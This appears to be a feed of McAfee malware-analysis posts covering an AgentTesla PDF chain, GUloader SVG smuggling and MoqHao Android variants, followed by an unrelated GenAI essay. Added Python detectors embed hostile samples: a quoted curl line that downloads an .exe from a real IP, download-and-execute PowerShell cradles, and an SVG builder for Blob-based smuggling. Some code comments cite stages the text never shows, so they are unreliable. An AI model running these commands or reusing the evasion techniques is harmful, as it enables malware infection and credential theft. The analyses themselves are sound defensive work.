Upon examining the internal structure of the PDF (Figure 4), it was discovered that within one of the seven objects, some hex data and an embedded URL were identified. The URL highlighted in the red box “https://bit[.]ly/newbookingupdates” is a Bitly URL. Attackers use Bitly URLs to hide malicious links, making them harder to detect. This is especially useful in phishing schemes where they trick users into revealing sensitive information. Bitly’s dynamic links allow attackers to change destinations, enhancing their ability to evade detection. Additionally, attackers exploit the trust associated with Bitly to improve the success of their social engineering tactics.
This URL is intended to connect to https://bio0king[.]blogspot[.]com
Figure 4: Embedded data in PDF
The text highlighted in yellow in Figure 4 appears to be in hexadecimal format. Converting it to ASCII gives the following:
Figure 5: ASCII Conversion
This is the reason behind the prompt observed in Figure 3, displaying the same alert message upon opening the PDF document.
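As an added example (not from the original post), the following Python scanner splits a PDF into its indirect objects, pulls out /URI actions and hex strings, decodes the hex and flags shortener hosts, reproducing the Figure 4 and Figure 5 steps on a constructed PDF. The shortener list and the placeholder bit.ly path are assumptions, not values from the sample.

```python
import re
from urllib.parse import urlparse

# One indirect object: "<num> <gen> obj ... endobj"
OBJ_RE = re.compile(rb"(\d+)\s+\d+\s+obj\b(.*?)\bendobj", re.S)
# /URI (literal string) inside an action dictionary; handles escaped parentheses
URI_RE = re.compile(rb"/URI\s*\(((?:\\.|[^\\)])*)\)", re.S)
# PDF hex string <...>; the lookbehind keeps "<<" dictionary delimiters out
HEX_RE = re.compile(rb"(?<!<)<([0-9A-Fa-f\s]{8,})>")
# Link shorteners commonly used to hide the real destination (assumed list)
SHORTENERS = {"bit.ly", "tinyurl.com", "t.co", "goo.gl", "is.gd"}


def decode_hex_string(raw: bytes) -> str:
    """Decode a PDF hex string to text (whitespace ignored, odd digit padded with 0)."""
    digits = re.sub(rb"\s+", b"", raw)
    if len(digits) % 2:
        digits += b"0"
    return bytes.fromhex(digits.decode("ascii")).decode("utf-8", errors="replace")


def scan_pdf(data: bytes) -> list:
    """Report, per object, embedded URIs, decoded hex strings and shortener hits."""
    findings = []
    for m in OBJ_RE.finditer(data):
        num, body = int(m.group(1)), m.group(2)
        uris = [u.decode("latin-1") for u in URI_RE.findall(body)]
        texts = [decode_hex_string(h) for h in HEX_RE.findall(body)]
        if not uris and not texts:
            continue
        shortened = [u for u in uris if (urlparse(u).hostname or "").lower() in SHORTENERS]
        findings.append({"obj": num, "uris": uris, "hex_text": texts, "shortened": shortened})
    return findings


# The alert text quoted in the write-up, used to build the constructed sample.
MSG = "Lettore non è compatibile!"


def build_sample_pdf() -> bytes:
    """Constructed PDF (not the real attachment): an OpenAction JavaScript object whose
    code is stored as a hex string, and a link annotation to a shortener placeholder."""
    hexjs = f"app.alert('{MSG}');".encode("utf-8").hex().encode("ascii")
    return (b"%PDF-1.7\n"
            b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj\n"
            b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
            b"3 0 obj << /Type /Page /Parent 2 0 R /Annots [5 0 R] >> endobj\n"
            b"4 0 obj << /S /JavaScript /JS <" + hexjs + b"> >> endobj\n"
            b"5 0 obj << /Type /Annot /Subtype /Link /A << /S /URI "
            b"/URI (https://bit.ly/PLACEHOLDER) >> >> endobj\n"
            b"trailer << /Root 1 0 R >>\n%%EOF\n")


if __name__ == "__main__":
    for f in scan_pdf(build_sample_pdf()):
        print(f"object {f['obj']}: uris={f['uris']} shortened={f['shortened']} text={f['hex_text']}")
```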
After clicking “OK,” another prompt appeared from Adobe Player, cautioning about the connection established to the address mentioned in the prompt i.e. “bit.ly”.
Figure 6: Connection to embedded URL
Upon granting permission for the redirection, the user is directed to the website “https://bio0king[.]blogspot[.]com”, which attempts to pass itself off as a legitimate Booking.com website. As illustrated in the figure below, Microsoft Defender SmartScreen alerts the user to the harmful nature of this website. Despite the warning, further analysis was conducted by proceeding to the website to observe subsequent actions.
Figure 7: Connection to disguised website
Upon accessing the website, a JavaScript file named “Booking.com-1728394029.js” was promptly downloaded. The JS file was intentionally named identically to the PDF file in an effort to deceive users into opening it.
Figure 8: Prompt of JS file download
Immediately upon initiating the download, redirection is triggered to the legitimate Booking.com website, aiming to prevent users from detecting any suspicious activity. The downloaded file is stored in the Downloads folder on the user’s system.
Figure 9: JS file downloaded
The content of the JavaScript file is heavily obfuscated. This tactic is commonly employed by attackers to conceal their code, thus complicating analysis efforts and evading detection mechanisms.
Figure 10: JS file content
Upon executing the JavaScript, the following process tree was observed:
Figure 11: Process tree
Command line:
Upon decoding and executing “Booking.com-1728394029.js,” a URL was acquired: “htloctmain25.blogspot.com/////////////////////////atom.xml.”
Using the PowerShell command line, an attempt was made to access the file located at htloctmain25.blogspot.com/////////////////////////atom.xml and then execute it using Invoke-Expression (iex). Here the attackers attempted to obfuscate the Invoke-Expression (iex) command by using the replace command within the PowerShell command line. As illustrated in the command line, a sleep command pauses execution for 5 seconds; the subsequent stages of the infection proceed after this interval.
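An added example (not code from the write-ups) covering the command line discussed here as well as the earlier VBScript-to-PowerShell stage and the Pikabot curl stage: it folds literal -replace/.replace() chains back into the string they build, then scores the normalized command for download cradles, execution, delays, hidden windows and dropped executables. The sample commands are constructed approximations (hosts are placeholders) except the curl line quoted earlier; the indicator lists are assumptions.

```python
import re

# ('literal' -replace 'pattern','replacement') and 'literal'.replace('a','b')
REPLACE_OP = re.compile(r"\(\s*'([^']*)'\s+-replace\s+'([^']*)'\s*,\s*'([^']*)'\s*\)", re.I)
REPLACE_METHOD = re.compile(r"'([^']*)'\.replace\(\s*'([^']*)'\s*,\s*'([^']*)'\s*\)", re.I)

# Assumed indicator families; each is a plain regex over the normalized command line.
INDICATORS = {
    "download": re.compile(r"\b(Invoke-RestMethod|irm|Invoke-WebRequest|iwr|DownloadString|DownloadFile|curl(\.exe)?|certutil)\b", re.I),
    "execute": re.compile(r"\b(Invoke-Expression|iex|autohotkey(\.exe)?|regsvr32|mshta|wscript)\b", re.I),
    "delay": re.compile(r"\b(Start-Sleep|sleep)\b", re.I),
    "hidden": re.compile(r"(-w(indowstyle)?\s+hidden|\battrib\b.*\+h)", re.I),
    "drop_exe": re.compile(r"(--output|-o)\s+\S+\.exe\b", re.I),
}


def deobfuscate_replace(cmd: str) -> str:
    """Fold replace-based string building into the literal it produces."""
    def fold_op(m):
        lit, pat, rep = m.groups()
        try:
            return "'" + re.sub(pat, rep, lit) + "'"     # -replace is regex based
        except re.error:
            return "'" + lit.replace(pat, rep) + "'"

    def fold_method(m):
        lit, pat, rep = m.groups()
        return "'" + lit.replace(pat, rep) + "'"         # .replace() is literal

    prev = None
    while prev != cmd:                                    # repeat for nested chains
        prev = cmd
        cmd = REPLACE_METHOD.sub(fold_method, REPLACE_OP.sub(fold_op, cmd))
    return cmd


def assess_command(cmd: str) -> dict:
    """Normalize, collect indicator families, and give a coarse verdict."""
    norm = deobfuscate_replace(cmd)
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(norm))
    if norm != cmd:
        hits.append("replace_obfuscation")
    suspicious = ("download" in hits and ("execute" in hits or "drop_exe" in hits)) or len(hits) >= 3
    return {"normalized": norm, "indicators": hits, "verdict": "suspicious" if suspicious else "benign"}


SAMPLE_COMMANDS = [
    # 1: constructed, modelled on the VBScript -> PowerShell -> AutoHotkey stage
    "powershell -c \"Invoke-RestMethod -Uri 'http://example.invalid/zuyagaoq' | Invoke-Expression\"",
    # 2: the Pikabot .js stage as quoted in the write-up (defanged URL kept)
    "\"C:\\Windows\\System32\\cmd.exe\" /c mkdir C:\\Dthfgjhjfj\\Rkfjsil\\Ejkjhdgjf\\Byfjgkgdfh & curl "
    "hxxp://103.124.105.147/KNaDVX/0.2642713404338389.dat --output C:\\Dthfgjhjfj\\Rkfjsil\\Ejkjhdgjf\\Byfjgkgdfh\\Ngjhjhjda.exe",
    # 3: constructed, modelled on the PDF chain's replace-obfuscated iex with a 5 s sleep
    "powershell -w hidden -c \"Start-Sleep 5; $c = Invoke-WebRequest 'http://example.invalid/atom.xml'; & ('i3x' -replace '3','e') $c.Content\"",
    # 4: constructed benign admin one-liner
    "powershell -c \"Get-ChildItem C:\\Logs | Sort-Object LastWriteTime\"",
]

if __name__ == "__main__":
    for cmd in SAMPLE_COMMANDS:
        r = assess_command(cmd)
        print(r["verdict"], r["indicators"])
```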
The file hosted at http://htloctmain25.blogspot.com/////////////////////////atom.xml is named atom.ps1, measuring approximately 5.5 MB in size. The figure below depicts the content of the file:
Figure 12: Content of .ps1 file
Let’s begin deciphering the script shown in Figure 11, using the colored markings as reference:
The Red marked content at the top of the script indicates that it will terminate several specified processes (“RegSvcs”, “mshta”, “wscript”, “msbuild”, “FoxitPDFReader”), presumably with the intention of injecting the final payload into one of these legitimate binaries. Furthermore, the script creates a directory at “C:\ProgramData\MINGALIES” for potential future utilization.
The Blue marked content within the script represents the decryption function, labeled as “asceeeeeeeeeeeeeeee”. This function is subsequently employed to decrypt various variables within the script.
The Green marked content towards the end of the script outlines the implementation of the persistence mechanism and describes the injection process into legitimate executables.
For reference and ease of comprehension, the variables defined in the script have been numbered accordingly. The decryption instructions for these variables are highlighted in Yellow for clarity and emphasis.
Following the sequence of instructions, if any of the specified processes are terminated, the script proceeds to define variables 1 and 2. Subsequently, the decryption loop is defined in the script. After the decryption loop, variable 3, named “Phudigum”, is defined in the script. Following that, the script decrypts variable 3 and executes the obtained decoded data using the Invoke-Expression (IEX) command.
The content of the decoded variable 3 is as follows:
Figure 13: Variable 3 after decryption
The code first bypasses the Microsoft Windows Anti-Malware Scan Interface (AMSI) scanning by setting a specific value and then proceeds to create registry entries for persistence. The script also defines functions for interacting with the system’s memory and sets global error action preferences to silently continue, suppressing any errors. It checks if a type named AMSIReaper exists and if not, defines this type with various declarations for interacting with the Windows kernel32.dll, including functions related to process memory manipulation.
Furthermore, the script executes a series of malicious actions aimed at compromising the security of the system. It begins by adding exclusions for specific file extensions, paths, and processes in Windows Defender, effectively evading detection for these items. Subsequently, it attempts to alter various Windows Defender preferences, such as disabling critical security features like the Intrusion Prevention System, Real-time Monitoring, and Script Scanning, while also adjusting settings related to threat actions and reporting. In addition, the script tries to modify registry settings associated with User Account Control (UAC) and disable the Windows Firewall, further weakening the system’s defenses. Lastly, it resets the global error action preference to continue, potentially concealing any errors encountered during execution and ensuring the script’s malicious actions remain undetected. Overall, these actions indicate a concerted effort to compromise the system’s security and potentially enable further malicious activities.
The subsequent instruction in Figure 11 decrypts variable 2, labeled “bulgumchupitum,” using the decryption function “asceeeeeeeeeeeeeeee,” and the result is executed by the Invoke-Expression (IEX) command. The decoded content of variable 2 follows:
Figure 14: Variable 2 after decryption
The content obtained after decrypting variable 2 is the heart of the script. The section highlighted in red in Figure 14 does the following:
The section marked in blue in Figure 14 does the following:
Figure 15: Data 1
Data 1 is a .NET DLL. As noted above, the script invokes method ‘C’ of the type ‘A.B’. Despite the heavy obfuscation of the file shown in Figure 16, method ‘C’ can be observed (highlighted in yellow), as can the function to which the paths of the framework executables and the data are passed (red box).
Figure 16: Data 1 dll
This DLL injects data2, the Agent Tesla payload, into the Regsvcs.exe process. The following figure shows the file configuration of data2: its version information disguises it as a legitimate McAfee package file (Figure 17), but the file is not signed with a valid certificate, which gives the forgery away.
Figure 17: Data2
The executable is heavily obfuscated, leaving most of its content unreadable; its many methods carry meaningless names, a deliberate tactic to slow down analysis.
Figure 18: Data2 exe
The obfuscation is elaborate: every string is decrypted at runtime by a sequence of instructions that receive specific parameters and return the plaintext, adding layers that hinder static analysis. Figure 19 shows one instance uncovered through reverse engineering: the malware begins querying the browser for information, and the highlighted instruction, once decrypted, yields the path of the Opera browser.
Figure 19: Fetching browser information
The following ProcMon logs show all the browsers the malware queried:
Figure 20: Procmon logs of browsers(1)
Figure 21: Procmon logs for browsers (2)
In addition, it steals browser history, cookies and credentials, SMTP and session information, and email-client data such as Outlook profiles.
Figure 22: Credentials
By debugging the code we uncovered the domain used for exfiltration. The following figure shows the URL:
Figure 23: Domain obtained
The same was evident from Procmon logs shown in the Figure below:
Figure 24: Procmon logs of Connection for exfiltration
The DNS record for the IP address 149.154.167.220 shows that it belongs to Telegram Messenger.
Figure 25: DNS record
AgentTesla uses Telegram bots for data exfiltration for several reasons. Traffic to the Telegram Bot API travels over HTTPS, so the stolen data is encrypted in transit without the attacker having to build a channel of their own (Telegram’s end-to-end encryption applies only to secret chats between users, not to bot traffic, so what the malware relies on here is transport encryption). Creating a bot requires no attacker-owned infrastructure, which preserves anonymity. The Bot API is trivial to drive, so the malware needs little more than a bot token and a chat identifier to talk to its command-and-control side. Because Telegram is a widely used messaging platform, connections to its servers blend into ordinary traffic and attract less suspicion than a bespoke domain. And since the service itself will not be taken down, the channel survives takedown efforts aimed at attacker-controlled domains.
Overall, the combination of transport security, anonymity, ease of use, stealth and resilience makes Telegram bots an appealing exfiltration channel for AgentTesla. To use it, the malware contacts the domain associated with the bot and transmits the data, which is then tracked by a specific bot ID.
Figure 26: TelegramBot for exfiltration
In a nutshell, this script was tasked with decoding the payload, retrieving legitimate .NET executable paths, performing process injection to execute the malware, collecting data, and ultimately exfiltrating the acquired information.
Returning to atom.ps1 (Figure 11), the next item is variable 4, labeled “koaskodkwllWWW”, which is decrypted with the same function “asceeeeeeeeeeeeeeee”. Its decoded content is:
Figure 27: Variable 4 decoded
This script establishes persistence by:
Ultimately, the content highlighted in green in Figure 11 performs the final task. The instructions are as follows:
Figure 28: Persistence instructions
Now, after substituting the values:
We cross-checked the registry and scheduled-task entries, and the script had done as directed:
Figure 29: Registry entry for Persistence
Figure 30: Task Scheduler
Figure 31: Procmon logs for persistence
In summary, the script schedules itself to run again after 213 minutes, creates a Run entry named “chromeupdateri”, and fetches atom.ps1 again from “htljan62024.blogspot.com//////////atom.xml”.
Upon opening the PDF in the old, unpatched version of Acrobat Reader, a prompt immediately appeared indicating the launch of MSHTA along with the entire JavaScript code contained therein. This is depicted in the figure below.
Figure 32: Prompt for embedded JavaScript
Upon examining the streams of the PDF, we discovered the identical script embedded within the document:
Figure 33: Embedded JavaScript in PDF
After MSHTA launches, it invokes an instance of PowerShell, which injects AgentTesla into Regsvcs.exe. With an old, unpatched version of Acrobat Reader, no interaction with the PDF is needed: merely opening the file infects the system.
The chain of events begins with the delivery of a PDF containing malicious content. Opening the PDF triggers the embedded JavaScript, which downloads and executes a PowerShell script. That script decrypts and executes a .NET DLL, which injects the AgentTesla payload into a legitimate process (Regsvcs.exe) to evade detection. The malware then exfiltrates the stolen data through a Telegram bot, and establishes persistence through a scheduled task and a Run registry entry so that it re-executes periodically. With the old Acrobat Reader version, no user interaction beyond opening the file was required, and inspection of the PDF streams confirmed the embedded script. The sequence, from initial infection through exfiltration and persistence, makes this campaign difficult to detect and contain.
Avoiding email phishing requires a vigilant, cautious approach. Common practices that help:
File | SHA256/URL |
--- | --- |
 | 8f8264c173e6d036e87b706dbb87e3036ae17df32e53a683c87bff94fce2c242 |
JavaScript | 3ea81c292f36f2583d2291e8a393014da62767447dba7b139a6c45574647aa2b |
ps1 file | db726e060f4feccf4bdfa843e3c10cbac80509585fd55c6d1bfce5e312a4e429 |
dll | 5b6d8f91201ba9c879e46062190817954e28ceb61a67e55870bb61d1960854ee |
exe | dec2ce698ab8600d96dd3353b5e47d802441c6df18aed1dd6a2b78311369659e |
IPv4 | 149.154.167.220 |
URL | http://htloctmain25.blogspot[.]com/atom.xml |
URL | https://bio0king[.]blogspot[.]com |
Table 1: Indicators of Compromise
The post Rise in Deceptive PDF: The Gateway to Malicious Payloads appeared first on McAfee Blog.
Authored by: Vignesh Dhatchanamoorthy
In the ever-evolving landscape of cybersecurity threats, staying ahead of malicious actors requires a deep understanding of their tactics and tools. Enter GUloader, a potent weapon in the arsenal of cybercriminals worldwide. This sophisticated malware loader has garnered attention for its stealthy techniques and ability to evade detection, posing a significant risk to organizations and individuals.
One of GUloader’s distinguishing features is its utilization of evasion techniques, making it particularly challenging for traditional security measures to detect and mitigate. Through polymorphic code and encryption, GUloader can dynamically alter its structure, effectively masking its presence from antivirus software and intrusion detection systems. This adaptability enables GUloader to persistently infiltrate networks and establish footholds for further malicious activity.
McAfee Labs has observed a recent GUloader campaign being distributed through a malicious SVG file delivered via email.
The SVG (Scalable Vector Graphics) file format is a widely used vector image format designed for describing two-dimensional vector and mixed vector/raster graphics in XML. One of the key features of SVG files is their support for interactivity and animation, achieved through JavaScript and CSS.
Modern web browsers such as Google Chrome, Mozilla Firefox, and Microsoft Edge have built-in support for rendering SVG files. When you open an SVG file in Chrome or Firefox, the browser renders the vector graphics using its built-in SVG rendering engine. This engine interprets the XML-based SVG code and displays the image accordingly on the web page.
Browsers treat SVG files as standard web content and handle them seamlessly within their browsing environments.
Figure 1: Infection chain
The execution process begins when the SVG file attached to the email is opened. The browser then downloads a ZIP file containing a WSF (Windows Script File), which carries the next stage. When the WSF runs, wscript.exe invokes PowerShell, which connects to a malicious domain and executes the content hosted there. That content includes shellcode that is injected into the MSBuild process, from which the remaining malicious actions proceed.
Figure 2: Process Tree
The recipient receives a spam email carrying a malicious SVG attachment named “dhgle-Skljdf.svg”.
Figure 3: Spam Email
JavaScript smuggled inside the SVG image contains the entire malicious ZIP archive. When the victim opens the attachment, the smuggled script reconstructs the archive in the browser and presents a dialog box prompting the user to save the file.
Figure 4: Saving file prompt
The SVG file builds a Blob object from the base64-encoded ZIP embedded in the file; when the SVG is opened, the browser offers that ZIP as a download.
Figure 5: SVG file code
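The Blob smuggling described above leaves the whole archive sitting in the SVG as a long base64 run, which is what a mail gateway or triage script should look for. The following is an added example, not code from the original post: it builds a constructed SVG with the same shape as the sample (a harmless one-line .wsf zipped, base64-encoded and turned into a Blob for download), then carves every base64 run out of the SVG text, keeps only the ones that decode to a ZIP, lists their members without extracting anything, and blocks on script-type member names. The SVG markup and file names are assumptions for the demonstration.

```python
import base64
import io
import re
import zipfile

# Member extensions that should never arrive inside an image attachment.
SCRIPT_EXTS = (".wsf", ".js", ".jse", ".vbs", ".vbe", ".hta", ".lnk", ".cmd", ".bat", ".ps1")

# Constructed stand-in for dhgle-Skljdf.svg. The script decodes the base64
# archive, wraps it in a Blob and clicks a download link, as the page describes.
SVG_TEMPLATE = """<svg xmlns="http://www.w3.org/2000/svg" onload="drop()">
<script><![CDATA[
function drop() {
  var raw = atob("__B64__");
  var bytes = new Uint8Array(raw.length);
  for (var i = 0; i < raw.length; i++) bytes[i] = raw.charCodeAt(i);
  var blob = new Blob([bytes], {type: "application/octet-stream"});
  var a = document.createElement("a");
  a.href = URL.createObjectURL(blob);
  a.download = "invoice.zip";
  a.click();
}
]]></script>
</svg>
"""


def build_sample_svg():
    """Zip a harmless one-line WSF and embed it in the SVG template."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("invoice.wsf",
                    '<job><script language="JScript">WScript.Echo("sample");</script></job>')
    return SVG_TEMPLATE.replace("__B64__", base64.b64encode(buf.getvalue()).decode())


# A base64 run long enough to be a payload rather than an inline icon.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")


def carve_smuggled_archives(svg_text):
    """Decode every long base64 run; return the member names of each run that
    is a ZIP archive (PK\\x03\\x04 local-file-header magic)."""
    archives = []
    for m in B64_RUN.finditer(svg_text):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
        except ValueError:          # binascii.Error is a ValueError
            continue
        if not raw.startswith(b"PK\x03\x04"):
            continue
        try:
            with zipfile.ZipFile(io.BytesIO(raw)) as zf:
                archives.append([info.filename for info in zf.infolist()])
        except zipfile.BadZipFile:
            continue
    return archives


def verdict(svg_text):
    """'block' if a smuggled archive carries a script, 'review' if it carries
    anything else, 'allow' if nothing was smuggled."""
    archives = carve_smuggled_archives(svg_text)
    for names in archives:
        if any(n.lower().endswith(SCRIPT_EXTS) for n in names):
            return "block"
    return "review" if archives else "allow"


if __name__ == "__main__":
    sample = build_sample_svg()
    print(carve_smuggled_archives(sample), verdict(sample))
```

Member listing is done on the in-memory bytes only; nothing is written to disk, so the check is safe to run on untrusted attachments in a gateway pipeline.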
Inside the zip file, there is an obfuscated WSF (Windows Script File). The WSF script employs several techniques to make analysis quite difficult.
Figure 6: Obfuscated WSF Script
It invokes PowerShell to establish a connection with a malicious domain, subsequently executing the hosted content retrieved from it.
Encoded PowerShell
Figure 7: Encoded PowerShell code
After Decoding
Figure 8: Decoded PowerShell code
URL: hxxps://winderswonders.com/JK/Equitably.mix
The URL hosts base64-encoded content, which, after decoding, contains shellcode and a PowerShell script.
Hosted Content
Figure 9: Hosted Base64 content
After decoding Base64
Figure 10: Decoded Base64 content
The above PowerShell script attempts to load the shellcode into the legitimate MSBuild process using the Process Hollowing technique.
After injection, the shellcode performs anti-analysis checks and then writes a value under the Run key to achieve persistence:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
The final stage uses the injected shellcode to download and execute the final malicious executable. GuLoader can also download and deploy a wide range of other malware variants.
File | SHA256/URL |
--- | --- |
 | 66b04a8aaa06695fd718a7d1baa19386922b58e797634d5ac4ff96e79584f5c1 |
SVG | b20ea4faca043274bfbb1f52895c02a15cd0c81a333c40de32ed7ddd2b9b60c0 |
WSF | 0a196171571adc8eb9edb164b44b7918f83a8425ec3328d9ebbec14d7e9e5d93 |
URL | hxxps://winderswonders[.]com/JK/Equitably[.]mix |
The post GUloader Unmasked: Decrypting the Threat of Malicious SVG Files appeared first on McAfee Blog.
Authored by Dexter Shin
MoqHao is a well-known Android malware family associated with the Roaming Mantis threat actor group first discovered in 2015. McAfee Mobile Research Team has also posted several articles related to this malware family that traditionally targets Asian countries such as Korea and Japan.
Recently the McAfee Mobile Research Team found that MoqHao began distributing variants that use a very dangerous technique. The distribution method itself is unchanged: a link to download the malicious app is sent via SMS. Typical MoqHao requires the user to install and launch the app before it can act, but this new variant requires no launch: its malicious activity starts automatically once the app is installed. This technique was introduced in a previous post; the difference is that it is now being abused by other well-known, active malware campaigns such as MoqHao. We have already reported this technique to Google, who are working on mitigations to prevent this type of auto-execution in a future Android version. Android users are currently protected by Google Play Protect, which is on by default on Android devices with Google Play Services. Google Play Protect can warn users or block apps known to exhibit malicious behavior, even when those apps come from sources outside of Play. McAfee Mobile Security detects this threat as Android/MoqHao.
MoqHao is distributed via phishing SMS messages (also known as Smishing). When a user receives an SMS message containing a malicious link and clicks it, the device downloads the malicious application. Phishing messages are almost the same as in previous campaigns:
Figure 1. Smishing message impersonating a notification from a courier service.
One noticeable change is that they now use URL shortener services. If the malware authors use their own domain, it can be quickly blocked but if they use legitimate URL shortener services, it is difficult to block the short domain because it could affect all the URLs used by that service. When a user clicks on the link in the message, it will be redirected to the actual malicious site by the URL shortener service.
As mentioned at the beginning, this variant behaves differently from previous ones. Typical MoqHao must be launched manually by the user after it is installed but this variant launches automatically after installation without user interaction:
Figure 2. Differences between typical MoqHao and Modern MoqHao
We explained this auto-execution technique in detail in a previous post but to briefly summarize it here, Android is designed so when an app is installed and a specific value used by the app is set to be unique, the code runs to check whether the value is unique upon installation. This feature is the one that is being abused by the highly active Trojan family MoqHao to auto-execute itself without user interaction. The distribution, installation, and auto-execution of this recent MoqHao variant can be seen in the following video:
In addition, this recent MoqHao variant uses Unicode strings in its app name differently than before. The technique makes some characters render in bold, but users still visually read the label as “Chrome”. This can defeat app-name-based detection that compares the app name (Chrome) with the package name (com.android.chrome):
Figure 3. App name using Unicode strings.
Additionally, they also use social engineering techniques to set malicious apps as the default SMS app. Before the settings window appears, they show a message telling you to set up the app to prevent spam, but this message is fake:
Figure 4. Fake message using social engineering techniques.
The different languages used in the text associated with this behavior also suggest that, in addition to Japan, the campaign targets South Korea, France, Germany, and India:
Figure 5. Fake messages designed to target different countries.
After the initialization of the malware is completed, it will create a notification channel that will be used to display phishing messages:
Figure 6. Create a notification channel for the next phishing attack.
The malware checks the device’s carrier and uses this notification to send phishing messages accordingly to trick users into clicking on them. MoqHao gets the phishing message and the phishing URL from Pinterest profiles.
Figure 7. Phishing message and URL in Pinterest profile
If the phishing string is empty, MoqHao will use the phishing message in the code:
Figure 8. Phishing notification code for each carrier
This variant also connects to the C2 server via WebSocket. However, it has been confirmed that several other commands have been added in addition to the commands introduced in the previous post:
Command | Description |
--- | --- |
getSmsKW | Send all SMS messages to C2 server |
sendSms | Send SMS messages to someone |
setWifi | Enable/disable Wifi |
gcont | Send whole contacts to C2 server |
lock | Store Boolean value in “lock” key in SharedPreferences |
bc | Check SIM state |
setForward | Store String value in “fs” key in SharedPreferences |
getForward | Get String value in “fs” key in SharedPreferences |
hasPkg | Check specific package installed on device |
setRingerMode | Set Sound/Vibrate/Silent mode |
setRecEnable | Set Vibrate/Silent mode according to SDK version |
reqState | Send device information (Network, Power, MAC, Permission) to C2 server |
showHome | Emulate Home button click |
getnpki | Send Korean Public Certificate (NPKI) to C2 server |
http | Send HTTP requests |
call | Call a specific number with Silent mode |
get_apps | Get list of installed packages |
ping | Check C2 server status |
getPhoneState | Get unique information such as IMEI, SIM number, Android ID, and serial number |
get_photo | Send all photos to C2 server |
The MoqHao malware family has been active for years, and it keeps adopting new ways to hide and reach users. This variant carries a much larger set of C2 commands than previous ones, actively uses legitimate sites such as Pinterest to store and update phishing data, and contains code aimed at Asian countries such as Japan and South Korea as well as France, Germany, and India. Moreover, we expect this new variant to be highly impactful because it infects a device simply by being installed, without being launched.
It is difficult for general users to find fake apps using legitimate icons and application names, so we recommend users to install secure software to protect their devices. For more information, visit McAfee Mobile Security.
SHA256 | Application Name | Package Name |
--- | --- | --- |
2576a166d3b18eafc2e35a7de3e5549419d10ce62e0eeb24bad5a1daaa257528 | chrome | gb.pi.xcxr.xd |
61b4cca67762a4cf31209056ea17b6fb212e175ca330015d804122ee6481688e | chrome | malmkb.zdbd.ivakf.lrhrgf |
b044804cf731cd7dd79000b7c6abce7b642402b275c1eb25712607fc1e5e3d2b | chrome | vfqhqd.msk.xux.njs |
bf102125a6fca5e96aed855b45bbed9aa0bc964198ce207f2e63a71487ad793a | chrome | hohoj.vlcwu.lm.ext |
e72f46f15e50ce7cee5c4c0c5a5277e8be4bb3dd23d08ea79e1deacb8f004136 | chrome | enech.hg.rrfy.wrlpp |
f6323f8d8cfa4b5053c65f8c1862a8e6844b35b260f61735b3cf8d19990fef42 | chrome | gqjoyp.cixq.zbh.llr |
The post MoqHao evolution: New variants start automatically right after installation appeared first on McAfee Blog.
The explosive growth of Generative AI has sparked many questions and considerations not just within tech circles, but in mainstream society in general. Both the advancement of the technology, and the easy access means that virtually anyone can leverage these tools, and much of 2023 was spent discovering new ways that Generative AI could be used to solve problems or better our lives.
However, in the rush to apply this transformative technology, we should also keep in mind “Maslow’s Hammer.” Attributed to Abraham Maslow, best known for outlining a hierarchy of needs, Maslow’s Hammer highlights an over-reliance on a single tool, a concept popularly summarized as “If all you have is a hammer, everything looks like a nail.” As corporations navigate the continuing evolution of AI, we need to be certain that we’re applying it where it makes the most sense, and not just because we can. This will ultimately save time, money, and energy that can be applied to building robust tools and solutions for viable use cases.
Recognizing when to use GenAI and when not to use it is a necessary skill set for full-stack domain-specific data scientists, engineers, and executives.
Running GenAI is expensive and not without tradeoffs. As of today, careless planning of a GenAI application can lead to a negative return on investment (due to the excessive operational cost), scalability and downtime issues (due to limited computing resources), and serious damage to the customer experience and brand reputation (due to the potential generation of improper content, hallucinations, mis/disinformation, misleading advice, etc.). Organizations struggle to control these variables in general, and the negative impacts and limitations must be offset by a huge value proposition.
One interesting aspect that can be observed across industries is the unexpected (but welcomed) side effects of going through the GenAI voyage, as some sort of eye-opening epiphany. How do we balance this risk/reward? What should we be looking at and what are the questions we should be asking to ensure that we’re successfully applying (or not) AI?
Breaking free from the complexity bias: as humans, we tend to favor and give credit to complex solutions only (known as ‘complexity bias’). Unfortunately, this particularly applies to GenAI applications nowadays, as we are influenced and “self-forced” to use GenAI to solve all problems. Just because “it seems to work”, it doesn’t mean it’s the best/optimal solution. It is by following this logic that some teams may have a significant chance of discovering that there are simpler (probably non-GenAI) means of solving some of these real-world problems (or parts of the problem!). Achieving this revelation requires a humble mind that is open to the possibility of considering that we don’t always need the most complex or expensive solution, even if it’s fancy and we can afford it.
It’s not always all or nothing: one aspect that works only for a few companies but not for most is the need to run GenAI all the time. If your business case is not around selling or supporting GenAI infrastructure, then you are likely using GenAI as a tool to accomplish domain-specific goals. If so, what every player in the industry would want is to maximize value while minimizing operational costs. At the current cost of running GenAI, the most obvious answer to achieve that is to avoid running it as much as possible, while still delivering most of the desired value. This delicate trade-off is a smart and elegant way of tackling the problem: not dismissing the value provided by GenAI nor obsessively using it up to the point that yields negative ROI. How do you achieve this? That’s likely the secret sauce of your domain-specific application area.
Ethical downsizing: GenAI models can be (and usually are) quite big. While this might be required for a few scenarios, it’s not necessary for most real-world domain-specific applications, as several GenAI authors are finding out across the industry (e.g., Phi-2). As such, it’s not only important for your business but also for humanity that we learn to downsize and optimize GenAI models as much as possible. It not only brings efficiency to your use case (cost saving, inference speed, lighter footprint, reduced risk, etc.) but also accomplishes a responsible use of the technology that is respectful of human resources. Each time you save a kilowatt or a few seconds of inference per user, you are explicitly contributing to a sustainable future where GenAI is leveraged to maximize value while minimizing environmental impact, and that’s something to be proud of.
Cross the stream where it is shallowest…
The key is to be humble enough to seek the optimal path: keep an open mind to consider non-GenAI solutions to your problems first. If GenAI is truly the best way to go, then find out if you really need to run it all the time or just sometimes. And finally, downsize as much as possible, not just because of cost and speed, but because of social responsibility.
